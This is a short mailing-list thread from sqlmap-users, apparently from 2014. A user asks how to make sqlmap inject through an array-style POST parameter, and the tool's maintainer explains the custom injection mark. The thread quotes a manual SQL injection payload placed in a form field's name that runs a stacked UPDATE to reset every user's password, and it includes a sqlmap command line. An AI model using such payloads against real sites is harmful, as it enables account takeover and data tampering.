Re: [sqlmap-users] (no subject)

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Thanks man ;

I want to send an array with query in its index as value of "name" POST
variable .

Remember if i want inject it manually should try >
<input type="text" id="edit-name" name="name[1 ;UPDATE {users} SET pass=
'test123'; -- ]" value="" size="60" maxlength="60" class="form-text
required error">

So tried (sqlmap/1.0-dev) :

python sqlmap.py -u "http://localhost//?id=n&ssid=w"
--data="name[0*]=name"  --risk=3 --flush-session --dbms=mysql

Sqlmap returns this error:

[WARNING] (custom) POST parameter '#1*' is not injectable

What does # mean here ?

And how to make it work under sqlmap ?

Regards

On Thu, Oct 23, 2014 at 11:00 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> You need to put a custom injection mark * at the place where you want
> sqlmap to inject. For example:
>
> ...name[1*]
>
> Bye
>
> p.s. your example with SELECT is not a proper one as queries are usually
> not supported in stacking
>
> On Thu, Oct 23, 2014 at 7:43 AM, a dehqan <deh...@gm...> wrote:
>
>> Hi Guys ,
>>
>> Is Sqlmap able to send an array instead of string while injecting?
>>
>> Like situation we  have html form and we want manually send post variable
>> 'name' this way (value is obtained from array) :
>>
>> name="name[1 ;select * from users -- ]
>>
>> I want do it with Sqlmap , but how ?
>>
>>
>> Regards dehqan
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>